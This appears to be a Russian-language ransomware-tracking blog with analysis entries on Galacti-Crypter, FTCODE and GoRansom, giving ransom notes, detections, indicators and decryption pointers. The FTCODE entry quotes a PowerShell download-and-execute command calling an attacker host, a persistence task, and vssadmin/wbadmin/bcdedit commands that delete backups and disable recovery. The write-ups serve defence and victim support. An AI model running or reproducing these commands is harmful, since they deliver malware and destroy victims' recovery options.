Если вы не видите здесь изображений, то используйте VPN.

суббота, 28 сентября 2019 г.

Galacti-Crypter

Galacti-Crypter Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English


Этот крипто-вымогатель шифрует данные пользователей с помощью RSA-2048, а затем требует выкуп в 0.2 BTC (~$150), чтобы вернуть файлы. Оригинальное название: Galacti-Crypter 1.7 и 1.8, RANWareV2. На файле написано: RANWareV2 и GL.exe

Обнаружения:
DrWeb -> нет данных
BitDefender -> Trojan.GenericKD.32300856
Malwarebytes -> Ransom.Galacti


© Генеалогия: выясняется, явное родство с кем-то не доказано.



К зашифрованным файлам вместо расширения добавляется ENCx45cR.
Пример зашифрованного файла: ENCx45cRPhoto001.jpg

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на конец сентября - начало октября 2019 г. Возможно, что он уже был в августе. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Текстовая записка с требованием выкупа отсутствует. Текст содержится внутри экрана блокировки. 


Содержание записки о выкупе в экране блокировки:
READ:
IT IS VERY IMPORTANT THAT YOU DO NOT RENAME ANY FILES THAT WERE ENCRYPTED! THIS WILL LEAD TO THAT FILE BEING RE-ENCRYPTED AND THEN WILL BE LOST FOREVER!
Your important files on this computer were encrypted using a public RSA-2048 key, generated for this computer (photos, videos, documents, ect... Click the View Secured Files button to view all of your encrypted files). 
Getting rid of this tool will NOT help. You will need this tool to DECRYPT and get access to your files again.
Your private decryption key has been created and stored on a secure and anonymous server. This key will allow you to decrypt all your files. This key is somewhere in the internet, and if payment is not made in the required time, it will be erased off the server permanently, and ALL your files will be permanently lost.
To obtain your private key for this computer, you will need to pay 150.00 USD / 150.00 EUR BitCoin. This is equal to 0.2 Bitcoin that must be paid to decrypt and regain access to all your files.
ANY attempts to remove, tamper or damage this software WILL lead to immediate termination of the private key and ALL your files will be permanently LOST.
Your time remaining is indicated on the left.
If you are ready to make the payment, please click the button below.

Перевод записки на русский язык:
ПРОЧТИТЕ:
ОЧЕНЬ ВАЖНО, ЧТОБЫ ВЫ НЕ ПЕРЕИМЕНОВЫВАЛИ ФАЙЛЫ, КОТОРЫЕ БЫЛИ ЗАШИФРОВАНЫ! ЭТО ПРИВЕДЕТ К ТОМУ, ЧТО ЭТОТ ФАЙЛ БУДЕТ ПОВТОРНО ЗАШИФРОВАН, А ЗАТЕМ БУДЕТ ПОТЕРЯН НАВСЕГДА!
Ваши важные файлы на этом компьютере были зашифрованы с использованием открытого ключа RSA-2048, созданного для этого компьютера (фото, видео, документы и т.д. Нажмите кнопку View Secured Files, чтобы просмотреть все зашифрованные файлы).
Избавление от этого инструмента НЕ поможет. Вам понадобится этот инструмент, чтобы РАСШИФРОВАТЬ и снова получить доступ к вашим файлам.
Ваш личный ключ расшифровки был создан и хранится на безопасном и анонимном сервере. Этот ключ позволит вам расшифровать все ваши файлы. Этот ключ находится где-то в Интернете, и если оплата не будет произведена в течение требуемого времени, он будет удален с сервера навсегда, и ВСЕ ваши файлы будут навсегда потеряны.
Чтобы получить свой закрытый ключ для этого компьютера, вам нужно будет заплатить 150,00 долларов США / 150,00 евро в биткойнах. Это равно 0,2 биткойнам, которые необходимо заплатить, чтобы расшифровать и восстановить доступ ко всем вашим файлам.
ЛЮБЫЕ попытки удалить, подделать или повредить эту программу приведут к немедленному прекращению действия закрытого ключа, и ВСЕ ваши файлы будут утеряны навсегда.
Ваше оставшееся время указано слева.
Если вы готовы сделать оплату, нажмите кнопку ниже.

Скриншоты других окон экрана блокировки.



Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1


Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
GL.exe
<random>.exe - случайное название вредоносного файла

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email:
BTC:
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺  VirusTotal analysis >>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.



=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===



=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Ещё не было обновлений этого варианта.



=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

Внимание! 
Файлы можно расшифровать.
Загрузите Emsisoft Decryptor для Galacti-Crypter Ransomware >>
 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as Galacti-Crypter)
 Write-up, Topic of Support
 * 
 Thanks: 
 Michael Gillespie, MalwareHunterTeam
 Andrew Ivanov (author)
 Emsisoft
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.

четверг, 26 сентября 2019 г.

FTCODE

FTCODE Ransomware

FTCode Ransomware

PowerShell Locker 2019 Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English


Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256 (в режиме CBC) + RSA-1024, а затем требует выкуп в $500 (0.06 BTC), чтобы вернуть файлы. Оригинальное название: в записке не указано. На файле написано: нет данных.

Обнаружения:
DrWeb -> W97M.Siggen.1152, Trojan.Siggen8.50878
BitDefender -> Undetected, W97M.Downloader.INK, VB:Trojan.VBS.Downloader.AIR
ALYac -> Trojan.Ransom.Powershell
Avira (no cloud) -> TR/Agent.gillq, TR/Dldr.Script.pskrh
Symantec -> W97M.Downloader, Downloader, JS.Downloader
Microsoft -> Trojan:Win32/Vigorf.A, TrojanDownloader:O97M/FTCdedoc.A!M
ESET-NOD32 -> PowerShell/Filecoder.V, GenScript.GKP
Kaspersky -> HEUR:Trojan.Script.Generic, Trojan.Gen.MBT, Trojan-Downloader.VBS.Agent.cxu
TrendMicro -> Trojan.W97M.POWLOAD.THJAEAI, Ransom.VBS.BXCODE.A

© Генеалогия: PowerShell Locker 2013 > PowerShell Locker 2015PowerWare > FTCODE
Изображение — логотип статьи

К зашифрованным файлам добавляется расширение: .FTCODE


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на конец сентября - начало октября 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка с требованием выкупа называется: READ_ME_NOW.htm

Содержание записки о выкупе:
All your files was encrypted!
Yes, You can Decrypt Files Encrypted!!! our price 500 USD
Your personal ID: b55718ca-d726-475c-8bba-52fdb5f18***
1. Download Tor browser - https://www.torproject.org/download/
2. Install Tor browser
3. Open Tor Browser
4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18***
5. Follow the instructions on this page
***** Warning*****
Do not rename files
Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them)
As evidence, we can for free back one file
Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.

Перевод записки на русский язык:
Все ваши файлы были зашифрованы!
Да, вы можете расшифровать файлы в зашифрованном виде !!! наша цена 500 долларов
Ваш персональный ID: b55718ca-d726-475c-8bba-52fdb5f18***
1. Скачайте Tor браузер - https://www.torproject.org/download/
2. Установите Tor браузер 
3. Откройте Tor браузер 
4. Откройте ссылку в Tor браузере: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18***
5. Следуйте инструкциям на этой странице
***** Предупреждение *****
Не переименовывать файлы
Не пытаться создавать резервные копии своих данных с помощью сторонних программ, это может привести к необратимой потере данных (если вы нам не верите и все еще пытаетесь сделать копии всех файлов, чтобы мы могли помочь вам, сторонние программы навредят им)
В качестве доказательства мы можем бесплатно вернуть один файл
Декодеры других пользователей не подходят для резервного копирования ваших файлов - ключ шифрования создается на вашем компьютере при запуске программы - он уникален.

Скриншоты Tor-сайта вымогателей:


По истечении заданного количества дней, если выкуп не выплачивается, то сумма выкупа увеличивается:
первые 3 дня - $500
3-5 дней - $2500
5-10 дней - $5000
10-30 дней - $25000

Есть кнопка для удаления приватного ключа. 





Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Метод распространения с помощью email-спама и вредоносного email-вложения и запуска описан в статье Certego. Вот краткая часть в переводе на русский язык: 

Адресат получает email со ссылкой на поддельный счет с вложенным документом под названием "Fattura-2019-951692.doc". Для просмотра "защищенного" содержимого требуется включить макросы. После включения макросов запускается следующий процесс Powershell:
powershell iex ((New-Object Net.WebClient).DownloadString('xxxp://home.southerntransitions.net/?need=9f5b9ee&vid=dpec2&81038'));
В результате чего загружается фрагмент Powershell-кода, который запускается с помощью команды "Invoke-Expression" ("iex"). Обратите внимание, функция "DownloadString" сохраняет результат запроса только в памяти, чтобы избежать обнаружения антивирусами.
Новый код Powershell - это FTCODE . При выполнении он выполняет следующий запрос GET: 
xxxp://home.southerntransitions[.]net/?need=6ff4040&vid=dpec2&
Он нужен, что загрузить файл сценария Visual Basic и сохранить его в C:\Users\Public\Libraries\WindowsIndexingService.vbs
Этот вариант JasperLoader, простой бэкдор, который может загружать дополнительные необходимые данные.
Затем он пытается создать ярлык "WindowsIndexingService.lnk" в папке автозапуска пользователя, который запускает JasperLoader. Для закрепления в системе и запуска после перезагрузки создается запланированная задача "WindowsApplicationService", ссылающаяся на этот ярлык. 


Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1


➤ Использует WindowsPowerShell и WindowsIndexingService.vbs, в очередной раз подтверждая их вредоносность для ОС Windows.

➤ Используется Gootkit, который способен похищать из браузеров историю посещений, пароли и файлы cookie, может делать снимки экрана и записывать все, что пользователи вводят внутри веб-форм (пароли, данные банковских карт). Кроме этого Gootkit собирает всю возможную информацию о зараженном хосте и подключенном нему оборудовании.

 Завершает работу, если присутствует файл %PUBLIC%\OracleKit\w00log03.tmp

Удаляет теневые копии файлов, отключает функции восстановления и исправления Windows на этапе загрузки командами:
 schtasks.exe /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 14 /du 23:59 /TR %PUBLIC%\Libraries\WindowsIndexingService.vbs
 cmd.exe /c bcdedit /set hacebzb bootstatuspolicy ignoreallfailures
 bcdedit.exe bcdedit /set hacebzb bootstatuspolicy ignoreallfailures
 cmd.exe /c bcdedit /set hacebzb recoveryenabled no
 bcdedit.exe bcdedit /set hacebzb recoveryenabled no
 cmd.exe /c wbadmin delete catalog -quiet
 wbadmin.exe wbadmin delete catalog -quiet
 cmd.exe /c wbadmin delete systemstatebackup
 wbadmin.exe wbadmin delete systemstatebackup
 cmd.exe /c wbadmin delete backup
 wbadmin.exe wbadmin delete backup
 cmd.exe /c vssadmin delete shadows /all /quiet
 vssadmin.exe vssadmin delete shadows /all /quiet

Список файловых расширений, подвергающихся шифрованию:
.3fr, .7z, .accdb, .ai, .apk, .arch00, .arw, .asset, .avi, .bar, .bay, .bc6, .bc7, .big, .bik, .bkf, .bkp, .blob, .bsa, .cas, .cdr, .cer, .cfr, .cr2, .crt, .crw, .css, .csv, .d3dbsp, .das, .dazip, .db0, .dba, .dbf, .dcr, .der, .desc, .dmp, .dng, .doc, .docm, .docx, .dwg, .dxg, .epk, .eps, .erf, .esm, .ff, .flv, .forge, .fos, .fpk, .fsh, .gdb, .gho, .hkdb, .hkx, .hplg, .hvpl, .ibank, .icxs, .indd, .itdb, .itl, .itm, .iwd, .iwi, .jpe, .jpeg, .jpg, .js, .kdb, .kdc, .kf, .layout, .lbf, .litemod, .lrf, .ltx, .lvl, .m2, .m3u, .m4a, .map, .mcmeta, .mdb, .mdbackup, .mddata, .mdf, .mef, .menu, .mlx, .mov, .mp4, .mpqge, .mrwref, .ncf, .nrw, .ntl, .odb, .odc, .odm, .odp, .ods, .odt, .orf, .p12, .p7b, .p7c, .pak, .pdd, .pdf, .pef, .pem, .pfx, .pkpass, .png, .ppt, .pptm, .pptx, .psd, .psk, .pst, .ptx, .py, .qdf, .qic, .r3d, .raf, .rar, .raw, .rb, .re4, .rgss3a, .rim, .rofl, .rtf, .rw2, .rwl, .sav, .sb, .sid, .sidd, .sidn, .sie, .sis, .slm, .snx, .sql, .sr2, .srf, .srw, .sum, .svg, .syncdb, .t12, .t13, .tax, .tor, .txt, .upk, .vcf, .vdf, .vfs0, .vpk, .vpp_pc, .vtf, .w3x, .wb2, .wma, .wmo, .wmv, .wotreplay, .wpd, .wps, .x3f, .xf, .xlk, .xls, .xlsb, .xlsm, .xlsx, .xxx, .zip, .ztmp (186 расширений).

Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, файлы walletархивы и пр.

Файлы, связанные с этим Ransomware:
Fattura-2019-951692.doc
READ_ME_NOW.htm
AFX50058.tmp
w00log03.tmp - специальный файл
powershell.exe
<random>.exe - случайное название вредоносного файла
Scan_New_Folder-816663234378244557295027251718767477098569059779.vbs

Файлы проектов: 
wscript.pdb, powershell.pdb

 В коде есть фраза "BXCODE hack your system". 

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Tor-URL: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/
URL: home.hopedaybook.com
connect.theshotboard.org
Email: - 
BTC: 1ENTEb7MbYfuvUYeTX8foCUPqUnQUWGZsN 
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Hybrid analysis >>
𝚺  VirusTotal analysis >>  VT>>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>  AR>>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: средняя.
Подробные сведения собираются регулярно. Присылайте образцы.



=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===



=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Обновление от 1 октября 2019:
Пост в Твиттере >>
Пост в Твиттере >>
Расширение: .FTCODE 
Записка:  READ_ME_NOW.htm
Tor-URL: xxxx://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18ede
URL: xxxx://home.southerntransitions.net/
xxxx://connect.southerntransitions.com/
Файлы: powershell.exe, Fattura-2019-951692.doc
Мьютексы: CLR_PerfMon_WrapMutex, CLR_CASOFF_MUTEX и другие, см. результаты VT.
Результаты анализов: VT + HA + AR



Обновление от 9-11 октября 2019:
Пост в Твиттере >>
Расширение: .<random> 
Записка:  READ_ME_NOW.htm
URL: xxxx://archive.org
xxxx://agency.heritage-insuranceagency.com
Файлы: powershell.exe, WindowsIndexingService.vbs, myvtfile.exe
Результаты анализов: VTAR


Обновление от 15 октября 2019:
Пост в Твиттере >>
Расширение: .<random> или .<random{6}>
Примеры: .509a49, .21f219, 13d419
Записка: READ_ME_NOW.htm
URL: xxxx://jes.dhinsuranceservices.com/
URL: xxxx://jes.whisperinghillequestriancenter.com
Файл MS Word: Nuovo_documento_52.doc  и с другими номерами
Результаты анализов: VT + HAAR / VT / VT + HA + VMR
➤ Содержание записки: 
All your files was encrypted!
Yes, You can Decrypt Files Encrypted!!!
Your personal ID: fbe8dd2b-9f8e-4753-b196-76554809b1f7
1. Download Tor browser - https://www.torproject.org/download/
2. Install Tor browser
3. Open Tor Browser
4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=fbe8dd2b-9f8e-4753-b196-76554809b1f7
5. Follow the instructions on this page
***** Warning*****
Do not rename files
Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party s oftware harms them)
As evidence, we can for free back one file
Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.


Обновление от 30 октября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Результаты анализов: VTAR
URL: xxxx://static.nexilia.it
xxxx://mobi.confessyoursins.mobi

Обновление от 1 ноября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Результаты анализов: VT + AR


Обновление от 7 ноября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
URL: xxxp://dbi.shadysidechurch.com/

Обновление от 28 ноября 2019:
Пост в Твиттере >>

 
На скриншотах выделен код инфо-стилера. 

Обновление от 10 декабря 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Файлы: ScanDocumento__11725497dfc376f565dc41df11738bdaff.vbs
Результаты анализов: VT + AR

Обновление от 11 декабря 2019:
Топик на форуме >>
Расширение: .<random> или .<random{6}>
Записка: READ_ME_NOW.htm

Обновление от 20 января 2020: 
FTCode теперь собирает учетные данные из браузеров (Internet Explorer, Mozilla Firefox, Google Chrome) и email-клиентов (Mozilla Thunderbird, Microsoft Outlook). Способы доступа отличаются: а) в случае с Internet Explorer и Microsoft Outlook, FTCode получает прямой доступ к ключам реестра; б) в случае с Mozilla Firefox, Mozilla Thunderbird и Google Chrome FTCode проникает в папки, где эти приложения хранят учетные данные.
После сбора информации FTCode отправляет её своим операторам, используя запрос POST, отправленный на его командно-контрольный сервер (C&C), а имена пользователей и пароли будут закодированы с использованием схемы кодирования Base64. 
Подробнее в статье на сайте BleepingComputer >>





=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
 Read to links: 
 Tweet on Twitter + Tweet + Tweet + myTweet
 ID Ransomware (ID as FTCode)
 Write-up, Topic of Support
 Earlier tweets I did not know about: Tw, Tw 
Added later:
Write-up BleepingComputer (October 3, 2019)
Write-up Certego (October 2, 2019)
*
 - Видеообзор от CyberSecurity GrujaRS
 Thanks: 
 GrujaRS, Michael Gillespie, Marco Bompani, Matteo Lodi
 Andrew Ivanov (author)
 Wojciech S., TG Soft, Certego, Lawrence Abrams
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.

пятница, 20 сентября 2019 г.

GoRansom

GoRansom POC Ransomware

(шифровальщик-НЕ-вымогатель) (первоисточник)

Translation into English


Этот крипто-вымогатель шифрует данные пользователей с помощью XOR, а затем сообщает, как самостоятельно вернуть файлы. Оригинальное название: GoRansom POC Ransomware. На файле написано: GoRansom.exe, windows_x86.exe. Написан на языке Golang.

Обнаружения:
DrWeb -> Trojan.Encoder.29575
BitDefender -> Gen:Variant.Razy.546521
Symantec -> ML.Attribute.HighConfidence
ALYac -> Trojan.Ransom.GoRansom
Malwarebytes -> Ransom.GoRansom

© Генеалогия: инструменты APT34 + Golang >> GoRansom POC
Изображение — только логотип статьи

К зашифрованным файлам добавляется расширение: .gore


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на вторую половину сентября 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка без требований выкупа называется: GoRansom.txt

Содержание записки о выкупе:
Files have been encrypted by The GoRansom POC Ransomware
  Decryption Key is hardcoded in the binary.
  Uses XOR encryption with an 8bit (byte) key.
  Only 255 possible keys.
  Run the ransomware in the command line with one argument, decrypt.
  Example: GoRansom.exe decrypt

Перевод записки на русский язык:
Файлы были зашифрованы с помощью GoRansom POC Ransomware
   Ключ расшифровки жестко закодирован в двоичном файле.
   Использует шифрование XOR с 8-битным (байтовым) ключом.
   Всего 255 возможных ключей.
   Запустите Ransomware в командной строке с одним аргументом, расшифровать.
   Пример: GoRansom.exe decrypt




Технические детали

Согласно Intezer-анализу может быть связан с утекшими в Сеть инструментами кибергруппы APT34 (они же Oilrig и HelixKitten), которым могли воспользоваться другие киберпреступники. 

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1


Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
GoRansom.txt
windows_x86.exe
GoRansom.exe
<random>.exe - случайное название вредоносного файла

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email: - 
BTC: - 
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Hybrid analysis >>
𝚺  VirusTotal analysis >>  VT>>  VT>>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>  AR>>  AR>>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.



=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===



=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Ещё не было обновлений этого варианта.



=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

Запустите GoRansom.exe в командной строке с аргументом decrypt
 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as GoRansom)
 Write-up, Topic of Support
 * 
 Thanks: 
 CyberSecurity GrujaRS, Michael Gillespie, JAMESWT
 Andrew Ivanov (author)
 ***
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.

Постоянные читатели

My tweet feed

My tweet feed
Follow me!

My profile on BC

My profile on BC
Follow me!

Форма для связи / Contact

Имя

Электронная почта *

Сообщение *